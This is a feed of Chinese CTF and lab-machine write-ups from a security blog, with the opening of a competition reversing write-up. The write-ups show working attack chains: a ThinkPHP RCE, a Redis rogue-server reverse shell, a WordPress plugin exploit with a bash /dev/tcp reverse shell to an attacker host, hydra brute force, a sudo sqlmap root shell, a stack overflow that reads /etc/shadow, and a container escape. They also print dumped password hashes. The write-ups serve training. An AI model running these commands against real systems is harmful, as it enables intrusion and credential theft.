Inf0
https://dirtycow.cn/
A Blog for Cybersecurity and Security Xiaobai
-
群友靶机-exchange
https://dirtycow.cn/349.html
2025-07-12T23:20:00+08:00
web打点靶机扫描┌──(root㉿kali)-[~]
└─# nmap -sS 192.168.1.39 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-12 01:46 EDT
Nmap scan report for 192.168.1.39
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:BD:44:E0 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds
开了22 和 80image-20250712220259253.png报错页面发现是ThinkPHP V5.0.5, 直接rce getshellimage-20250712221333094.png内网横向fscan -h 172.19.0.0/24 -np
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-07-12 14:17:09] [INFO] 暴力破解线程数: 1
[2025-07-12 14:17:09] [INFO] 开始信息扫描
[2025-07-12 14:17:09] [INFO] CIDR范围: 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 生成IP范围: 172.19.0.0.%!d(string=172.19.0.255) - %!s(MISSING).%!d(MISSING)
[2025-07-12 14:17:09] [INFO] 解析CIDR 172.19.0.0/24 -> IP范围 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 最终有效主机数量: 256
[2025-07-12 14:17:09] [INFO] 开始主机扫描
[2025-07-12 14:17:09] [INFO] 有效端口数量: 233
[2025-07-12 14:17:21] [SUCCESS] 端口开放 172.19.0.1:22
[2025-07-12 14:17:21] [SUCCESS] 服务识别 172.19.0.1:22 => [ssh] 版本:8.4p1 Debian 5+deb11u3 产品:OpenSSH 系统:Linux 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3.]
[2025-07-12 14:17:45] [SUCCESS] 端口开放 172.19.0.3:80
[2025-07-12 14:17:50] [SUCCESS] 服务识别 172.19.0.3:80 => [http] 版本:1.18.0 产品:nginx
[2025-07-12 14:29:31] [SUCCESS] 端口开放 172.19.0.2:6379
[2025-07-12 14:29:36] [SUCCESS] 服务识别 172.19.0.2:6379 => [redis] 版本:5.0.14 产品:Redis key-value store
fscan扫描内网 ,发现了172.19.0.2:6379跑了个redis传个frp,开个socks代理,尝试连接redis┌──(root㉿kali)-[~]
└─# proxychains4 -q redis-cli -h 172.19.0.2 -p 6379
172.19.0.2:6379> info
# Server
redis_version:5.0.14
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:82e99d45f54e2614
redis_mode:standalone
os:Linux 4.19.0-27-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:1
run_id:e88d7ed01f6f98ec6aacd23601cf3eb1ab6cc8df
tcp_port:6379
uptime_in_seconds:1231
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:7500446
executable:/data/redis-server
config_file:
# Clients
connected_clients:1
client_recent_max_input_buffer:4
client_recent_max_output_buffer:4100800
blocked_clients:0
# Memory
used_memory:854176
used_memory_human:834.16K
used_memory_rss:12750848
used_memory_rss_human:12.16M
used_memory_peak:4953952
used_memory_peak_human:4.72M
used_memory_peak_perc:17.24%
used_memory_overhead:840974
used_memory_startup:791280
used_memory_dataset:13202
used_memory_dataset_perc:20.99%
allocator_allocated:1424312
allocator_active:1716224
allocator_resident:8458240
total_system_memory:2092433408
total_system_memory_human:1.95G
used_memory_lua:37888
used_memory_lua_human:37.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.20
allocator_frag_bytes:291912
allocator_rss_ratio:4.93
allocator_rss_bytes:6742016
rss_overhead_ratio:1.51
rss_overhead_bytes:4292608
mem_fragmentation_ratio:15.70
mem_fragmentation_bytes:11938672
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1752329680
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0
# Stats
total_connections_received:2
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:72
total_net_output_bytes:14801
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
# Replication
role:master
connected_slaves:0
master_replid:20ebee4cf286daa409471774f86ee700d032f99f
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.697228
used_cpu_user:0.911468
used_cpu_sys_children:0.000000
used_cpu_user_children:0.001602
# Cluster
cluster_enabled:0
# Keyspace
redis未授权,尝试各种写马姿势弹shell都不行,和bamuwe交流得知 redis主机不出网可以将攻击机的端口映射到内网,也可以将内网端口映射出来 web主机上有python3的环境,直接传一个简易的nc上去import socket
import threading
import sys
def recv_thread(conn):
try:
while True:
data = conn.recv(4096)
if not data:
print("\nConnection closed by client.")
break
print(data.decode(errors='ignore'), end='', flush=True)
except Exception as e:
print(f"\nReceive error: {e}")
finally:
conn.close()
sys.exit(0)
def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <listen_port>")
sys.exit(1)
listen_port = int(sys.argv[1])
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('0.0.0.0', listen_port))
server.listen(1)
print(f"Listening on 0.0.0.0:{listen_port} ...")
conn, addr = server.accept()
print(f"Connection from {addr[0]}:{addr[1]} established!")
t = threading.Thread(target=recv_thread, args=(conn,), daemon=True)
t.start()
try:
while True:
cmd = sys.stdin.readline()
if not cmd:
break
conn.sendall(cmd.encode())
except KeyboardInterrupt:
print("\nUser interrupted.")
finally:
conn.close()
server.close()
if __name__ == "__main__":
main()
https://github.com/n0b0dyCN/redis-rogue-server使用这个工具直接一把梭2025/07/12 10:59:33 CMD: UID=33 PID=760 | ./pspy64
2025/07/12 10:59:33 CMD: UID=33 PID=704 | /bin/bash
2025/07/12 10:59:33 CMD: UID=33 PID=703 | python3 -c import pty;pty.spawn('/bin/bash')
2025/07/12 10:59:33 CMD: UID=33 PID=697 | sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=693 | sh -c uname -a; w; id; sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=692 | md5sum
2025/07/12 10:59:33 CMD: UID=33 PID=472 | /bin/bash
2025/07/12 10:59:33 CMD: UID=33 PID=471 | python3 -c import pty;pty.spawn('/bin/bash')
2025/07/12 10:59:33 CMD: UID=33 PID=470 | php-fpm: pool www
2025/07/12 10:59:33 CMD: UID=33 PID=469 | sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=465 | sh -c uname -a; w; id; sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=403 | php-fpm: pool www
2025/07/12 10:59:33 CMD: UID=33 PID=32 | ./frpc -c frps.ini
2025/07/12 10:59:33 CMD: UID=33 PID=30 | /bin/bash
2025/07/12 10:59:33 CMD: UID=33 PID=29 | python3 -c import pty;pty.spawn('/bin/bash')
2025/07/12 10:59:33 CMD: UID=33 PID=28 | sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=24 | sh -c uname -a; w; id; sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=15 | php-fpm: pool www
2025/07/12 10:59:33 CMD: UID=33 PID=14 | php-fpm: pool www
2025/07/12 10:59:33 CMD: UID=33 PID=9 | nginx: worker process
2025/07/12 10:59:33 CMD: UID=0 PID=8 | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
2025/07/12 10:59:33 CMD: UID=0 PID=7 | nginx: master process /usr/sbin/nginx -g daemon off;
2025/07/12 10:59:33 CMD: UID=101 PID=6 | /usr/sbin/mariadbd
2025/07/12 10:59:33 CMD: UID=0 PID=1 | /usr/bin/python3 /usr/bin/supervisord -c /etc/supervisord.conf
2025/07/12 11:00:01 CMD: UID=0 PID=768 | runc init
2025/07/12 11:00:01 CMD: UID=0 PID=773 | rm -fv /var/www/html/exp.so 要注意服务器会定时删除so后缀的文件,将exp.so名称成一个没有后缀的文件就行www-data@0bb9bcb43160:/tmp$ python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
< python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 172.19.0.2:6379
[info] SERVER 172.19.0.3:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
r
[info] Open reverse shell...
Reverse server address: 172.19.0.3
172.19.0.3
Reverse server port: 5555
5555
[info] Reverse shell payload sent.
[info] Check at 172.19.0.3:5555
[info] Unload module...
$ python3 s.py
Usage: s.py <listen_port>
$ python3 s.py 5555
id
Listening on 0.0.0.0:5555 ...
Connection from 172.19.0.2:56334 established!
uid=999(redis) gid=999(redis) groups=999(redis)成获取redis权限cat /opt/user.txt
flag{user-4f6311d4cf5776f0316c2f1b6526a653}提权根据bamuwe的提示,查看web主机的数据库www-data@0bb9bcb43160:/tmp$ mysql -uroot -proot
mysql -uroot -proot
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 7
Server version: 10.5.29-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| hnymwl_com_utf8 |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.000 sec)
MariaDB [(none)]> use hnymwl_com_utf8;
use hnymwl_com_utf8;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [hnymwl_com_utf8]> show tables;
show tables;
+---------------------------+
| Tables_in_hnymwl_com_utf8 |
+---------------------------+
| codepay_order |
| codepay_user |
| sdad3135 |
| wp_allot |
| wp_area |
| wp_balance |
| wp_bankcard |
| wp_bankinfo |
| wp_banks |
| wp_cardinfo |
| wp_catproduct |
| wp_conf |
| wp_config |
| wp_gg |
| wp_integral |
| wp_klinedata |
| wp_newsclass |
| wp_newsinfo |
| wp_opentime |
| wp_order |
| wp_order_log |
| wp_payment |
| wp_price_log |
| wp_productclass |
| wp_productdata |
| wp_productinfo |
| wp_refundlog |
| wp_risk |
| wp_usercode |
| wp_userinfo |
| wp_webconfig |
| wp_wechat |
+---------------------------+
32 rows in set (0.001 sec)
MariaDB [hnymwl_com_utf8]> select * from wp_userinfo;
select * from wp_userinfo;
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
| uid | username | upwd | utel | utime | agenttype | otype | ustatus | oid | address | portrait | lastlog | managername | comname | comqua | rebate | feerebate | usertype | wxtype | openid | nickname | logintime | usermoney | userpoint | minprice |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
| 1 | admin | 35a6b91de813873ca887f5d9b681d180 | | 1480061674 | 2 | 3 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | 0 | 0 | NULL | admin | NULL | 0.00 | NULL | NULL |
| 5632 | 10005632 | 18aed8d2a11896a6e76180b3d87e64bb | 123456 | 1592404993 | 0 | 0 | 0 | 1 | NULL | NULL | 1597391565 | admin | NULL | NULL | NULL | 0 | 0 | 0 | NULL | www | 1597391565 | 11670.00 | NULL | NULL |
| 5634 | 18888888888 | cf9c0c4996398526203b25d179b60aad | 18888888888 | 1592469112 | 0 | 0 | 0 | 666 | NULL | NULL | 1751965186 | AN | NULL | NULL | NULL | 0 | 0 | 0 | NULL | 小可爱 | 1751965186 | 680278.00 | NULL | NULL |
| 5635 | 10005635 | f9fb7dcf1f8af5b50235be3cbccf90ee | 19216813711 | 1752205841 | 0 | 0 | 0 | dashazi | NULL | NULL | 1752205841 | whatcanisay | NULL | NULL | NULL | 0 | 0 | 0 | NULL | root | 1752205841 | 0.00 | NULL | NULL |
| 5636 | 10005636 | cafc17ccad5b7523338f81ab912c2750 | 13333333333 | 1752296822 | 0 | 0 | 0 | 1 | NULL | NULL | 1752296822 | NULL | NULL | NULL | NULL | 0 | 0 | 0 | NULL | test | 1752296822 | 0.00 | NULL | NULL |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
5 rows in set (0.000 sec)
MariaDB [hnymwl_com_utf8]>
在wp_userinfo表中发现了一个root的密码,将web代码脱下来审计,查看密码加密方式public function login()
{
$userinfo = Db::name('userinfo');
//判断是否已经登录
if (isset($_SESSION['uid'])) {
$this->redirect('index/index?token='.$this->token);
}
if(iswechat() && 1==2){
//微信浏览器 微信登录
if(cookie('wx_info')){
$wx_info = cookie('wx_info');
$data['openid'] = $wx_info['openid'];
$checkuser = Db::name('userinfo')->where($data)->value('uid');
//判断是否已经注册
if($checkuser){ //已经注册直接記錄session
$_SESSION['uid'] = $checkuser;
//更新登录时间
$t_data['logintime'] = $t_data['lastlog'] = time();
$t_data['uid'] = $checkuser;
$userinfo->update($t_data);
$this->redirect('index/index');
}else{ //未注册 则注册 默认密碼为123456
$data['nickname'] = $wx_info['nickname'];
$data['utime'] = time();
//$data['upwd'] = md5('123456'.$data['utime']);
$data['otype'] = 0;
$data['ustatus'] = 0;
$data['address'] = $wx_info['country'].$wx_info['province'].$wx_info['city'];
$data['portrait'] = $wx_info['headimgurl'];
if(isset($_SESSION['fid']) && $_SESSION['fid']>0){
$fid = $_SESSION['fid'];
$fid_info = $userinfo->where(array('uid'=>$fid,'otype'=>101))->value('uid');
if($fid_info){
$data['oid'] = $fid;
}
}
//插入数据
$ids = $userinfo->insertGetId($data);
$newdata['uid'] = $ids;
$newdata['username'] = 10000000+$ids;
$newids = $userinfo->update($newdata);
//清除cookie 为了安全
cookie('wx_info', null);
//記錄session
$_SESSION['uid'] = $ids;
//更新登录时间
$t_data['logintime'] = $t_data['lastlog'] = time();
$t_data['uid'] = $ids;
$userinfo->update($t_data);
$this->redirect('login/addpwd?token='.$this->token);
}
}else{
$this->redirect('wechat/get_wx_userinfo');
}
}else{
//web用戶登录请求
if(input('post.')){
$data = input('post.');
//验证用戶信息
if(!isset($data['username']) || empty($data['username'])){
return WPreturn('请输入用戶名!',-1);
}
if(!isset($data['upwd']) || empty($data['upwd'])){
return WPreturn('请输入密碼!',-1);
}
//查询用戶
$result = $userinfo
->where('username',$data['username'])->whereOr('nickname',$data['username'])->whereOr('utel',$data['username'])
->field("uid,upwd,username,utel,utime,otype,ustatus")->find();
//验证用戶
if(empty($result)){
return WPreturn('登录失败,用戶名不存在!',-1);
}else{
if(!in_array($result['otype'], array(0,101))){ //非客户无权登录
return WPreturn('您无权登录!',-1);
}
if($result['upwd'] == md5($data['upwd'].$result['utime'])){
if ($result['ustatus']==0)
{
$_SESSION['uid'] = $result['uid'];
//更新登录时间
$t_data['logintime'] = $t_data['lastlog'] = time();
$t_data['uid'] = $result['uid'];
$userinfo->update($t_data);
return WPreturn('登录成功!',1);
}elseif($result['ustatus']==1){
return WPreturn('登录失败,您的账户暂时被冻结!',-1);
}else{
return WPreturn('登录失败,用戶名不存在!',-1);
}
}
else{
return WPreturn('登录失败,密碼错误!',-1);
}
}
}
return $this->fetch();
}加密密码是 md5(pass+时间戳)可以写脚本爆破,也可以不写,群里直接提示了 密码是managername字段下的whatcanisay登录到redis主机的rootcat /proc/self/status |grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000猜测这应该是个特权容器ls /dev/ | grep sda
sda
sda1
sda2
sda5
mount /dev/sda1 /mnt
cd /mnt
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root
ls
root.txt
cat root.txt
flag{root-6dbfaf239023f6da6ed2ffc59d3bcea5}
将sda1挂载上,发现这就是主机的目录,成功逃逸
-
群友靶机-New
https://dirtycow.cn/345.html
2025-07-02T20:00:00+08:00
web打点image-20250702082959738.png发现是wordpress 随便点几下跳转了http://new.dsz 改个hostswordpress的话就走正常流程,wpscan扫用户爆破密码先整上,发现没什么成果image-20250702083232613.png发现用了Social Warfare v3.5.2插件,随便一搜就找到rce https://github.com/hash3liZer/CVE-2019-9978┌──(root㉿kali)-[~]
└─# cat payload
<pre>system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.37/4444 0>&1'")</pre>
┌──(root㉿kali)-[~]
└─# python2 wp.py -t http://new.dsz --payload-uri http://192.168.1.37/payload
[>] Sending Payload to System!
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.1.37] from (UNKNOWN) [192.168.1.36] 33860
bash: cannot set terminal process group (430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@New:/var/www/new.dsz/wp-admin$
成功getshell提权www-data@New:/home$ cd /opt
cd /opt
www-data@New:/opt$ ls
ls
andeli_cred
www-data@New:/opt$
在opt下有个andeli_cred可执行文件,执行输出一堆类似md5的值,尝试用这些字符串去爆破andeli用户┌──(root㉿kali)-[~]
└─# hydra -l andeli -P 1 ssh://192.168.1.36 -vV -f -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-01 20:26:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10001 login tries (l:1/p:10001), ~1001 tries per task
[DATA] attacking ssh://192.168.1.36:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://andeli@192.168.1.36:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.36:22
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "固定MD5插入位置: 665" - 1 of 10001 [child 0] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "eea0353df30b9b38f5f280db88912f91" - 2 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "e31195e88f31a699c9c499f129248b56" - 3 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "f788c604535faf9685a1ea30355b1a20" - 4 of 10001 [child 3] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1a8d0816b7556ebe36f2022387e92093" - 5 of 10001 [child 4] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "a11b921496af55d8bdabfde74d06d9a8" - 6 of 10001 [child 5] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "ab33d487a26f748312e0fd84a8a724fc" - 7 of 10001 [child 6] (0/0)
............................
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5cca227ce87f76ad1728abcfbb0dd792" - 658 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "35d57416c953f0007381e409006d700a" - 659 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5dfd113da80981a0421272c7224a2448" - 660 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "145258ff008912955a7cc33f6798cd0d" - 661 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1506df5efe700055ad170466cff8cf5e" - 662 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "55425a0487587ae27f984fe0ed8add82" - 663 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "3d4875cfc174c5635fb9ea9c7164ef61" - 664 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "cb93062c7903f67452d3c6f476855f71" - 665 of 10001 [child 7] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "9eeb22195b4eb7a35bcad0f45761eb7b" - 666 of 10001 [child 9] (0/0)
[22][ssh] host: 192.168.1.36 login: andeli password: 9eeb22195b4eb7a35bcad0f45761eb7b
登录ssh,三板斧,找一下suid,没发现可利用的看一下sudo -landeli@New:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
andeli@New:~$ sudo -l
Matching Defaults entries for andeli on New:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User andeli may run the following commands on New:
(ALL) NOPASSWD: /usr/bin/sqlmap可以用root执行sqlmapandeli@New:~$ sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
___
__H__
___ ___[)]_____ ___ ___ {1.5.2#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:43:51 /2025-07-01/
[20:43:51] [INFO] testing connection to the target URL
# id
uid=0(root) gid=0(root) groups=0(root)
#
-
yulian
https://dirtycow.cn/300.html
2025-06-30T00:20:00+08:00
web打点image-20250625125350343.png模拟终端执行image-20250625125435114.png查看/opt/code/test.c 文件 伪随机,跑代码得到三个数 image-20250625125627753.png用这三个数进行端口敲门,就会开放8080端口image-20250630003121432.png访问8080, 密码爆破 admin/123457目录扫描,发现接口/download对参数进行爆破,爆破出参数为file,可以任意文件读取读取/proc/self/maps 查看内存image-20250625130035544.png找到/app/javaserver-0.0.1-SNAPSHOT.jar使用这个接口读取jar反编译发现反序列化接口image-20250625130317874.png直接打CommonsCollections链子使用ysoserial生成反弹shell payloadimage-20250625130758468.pngimage-20250625130932791.png带上cookie发送payload getshell内网横向上传frp 搭建socks代理 使用fscan 等工具扫描内网主机扫描到内网主机172.17.0.2,开起来80和22image-20250630003224744.png查看80端口,是一个关于暴力破解的讲解,在最底下有一个注释内容500-worst-passwords这是seclists中的一个字典,使用这个字典去爆破root@172.17.0.2 root/mountainssh连上去 在/usr/bin中发现可疑文件 userLoginimage-20250625131839654.pngida分析image-20250625132049440.png文件加密函数 跟进去image-20250625132126112.pngimage-20250625132132053.png标准的xtea加密image-20250625132213818.png找到key和输出的文件因为是常量定义的key 和 读取的文件的文件名,这里ida分析将这两值合在了一起xtea的key为16位,分成4组进行加密key-for-user-ldz是key , id_ed25519是读取的文件名很明显是一个私钥,写脚本解密output.encimage-20250625132545311.png找到这个文件在/etc/下提取出来解密#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#define BLOCK_SIZE 8
#define ROUNDS 64
const char FIXED_KEY_STR[16] = "key-for-user-ldz";
const char *INPUT_FILE = "output.enc";
const char *OUTPUT_FILE = "decrypted.txt";
void xtea_decrypt(uint32_t v[2], const uint32_t key[4]) {
uint32_t v0 = v[0], v1 = v[1];
uint32_t delta = 0x9E3779B9, sum = delta * ROUNDS;
for (int i = 0; i < ROUNDS; ++i) {
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
sum -= delta;
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
}
v[0] = v0; v[1] = v1;
}
void key_from_fixed_string(uint32_t key[4]) {
for (int i = 0; i < 4; ++i) {
key[i] = ((uint32_t)FIXED_KEY_STR[i*4]) |
((uint32_t)FIXED_KEY_STR[i*4 + 1] << 8) |
((uint32_t)FIXED_KEY_STR[i*4 + 2] << 16) |
((uint32_t)FIXED_KEY_STR[i*4 + 3] << 24);
}
}
void decrypt_file() {
FILE *fin = fopen(INPUT_FILE, "rb");
FILE *fout = fopen(OUTPUT_FILE, "wb");
if (!fin || !fout) {
perror("文件打开失败");
exit(1);
}
uint32_t key[4];
key_from_fixed_string(key);
uint8_t buffer[BLOCK_SIZE];
size_t read_size;
while ((read_size = fread(buffer, 1, BLOCK_SIZE, fin)) == BLOCK_SIZE) {
uint32_t block[2];
memcpy(block, buffer, BLOCK_SIZE);
xtea_decrypt(block, key);
fwrite(block, 1, BLOCK_SIZE, fout);
}
fclose(fin);
fclose(fout);
printf("解密完成:%s → %s\n", INPUT_FILE, OUTPUT_FILE);
}
int main() {
decrypt_file();
return 0;
}
查看解密完的文件image-20250625132820366.png是个私钥,设置权限600 ,根据解密的key,可以得知是用户ldz的私钥登录这个用户image-20250625133012806.png提权localhost:~$ find / -perm -4000 2>/dev/null
/opt/vuln
/bin/bbsuid查看suid有个vuln,ida分析一下image-20250625133214597.png让flag=1就能执行secret()函数image-20250625133252635.png这个函数读取/etc/shadow这里很明显是一个栈溢出覆盖flag的值,进行判断绕过payload:localhost:~$ python -c "print('A'*44 + '\x01\x00\x00\x00')" | /opt/vuln
root:$6$W5FUwrTeo8vXfNot$qJazigaYSqk8ezVfjHckZb2XjxkrJsniQa5MA1o.j9apE1BMYX5vYuJVEJ2hYbNsR0q9IWOSSt1I40vNYxvKO0:20263:0:::::
bin:!::0:::::
daemon:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
games:!::0:::::
ntp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
klogd:!:20205:0:99999:7:::
chrony:!:20205:0:99999:7:::
ldz:$6$qCU7eP8wj/Pvo1FB$Ooou6p.TF3M/kMB29XrzQ6XVNbq7c46lGzNvRPOJ55GAXJ0h.jmbc8VHhGjFgwXLHPSbNt96l/rmUYgDqpo8Y0:20263:0:99999:7:::
nginx:!:20263:0:99999:7:::
成功读取shadow爆破得到root密码┌──(root㉿kali)-[~]
└─# john --format=sha512crypt --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
┌──(root㉿kali)-[~]
└─# john hash --show
root:yulianateamo:20263:0:::::
1 password hash cracked, 0 left
┌──(root㉿kali)-[~]
└─# ssh root@10.20.73.10
root@10.20.73.10's password:
localhost:~#
localhost:~#
localhost:~# ls
root.txt
localhost:~# cat root.txt
flag{98ecb90d5dcef41e1bd18f47697f287a}
localhost:~#
-
第七届浙江省大学生网络与信息安全竞赛决赛reverse-wp
https://dirtycow.cn/269.html
2024-11-09T17:51:00+08:00
Reverse1思路:64位elfimage-20241110155524669.pngida分析image-20241110160145828.png分析这几个函数init函数初始化了一个table,一看就是rc4加密image-20241110160217367.png继续看crypt1 和 crypt2, 是魔改的rc4image-20241110160408630.pngbefore_main函数加密key,秘钥是keykeyimage-20241110162211876.pngafter_main函数使用加密之后的key作为秘钥加密了flagimage-20241110162622396.pngexp:def crypt1(s,key, key_len):
v5 = 0
v6 = 0
res = []
for i in range(key_len):
v5 = (v5 + 1) % 256
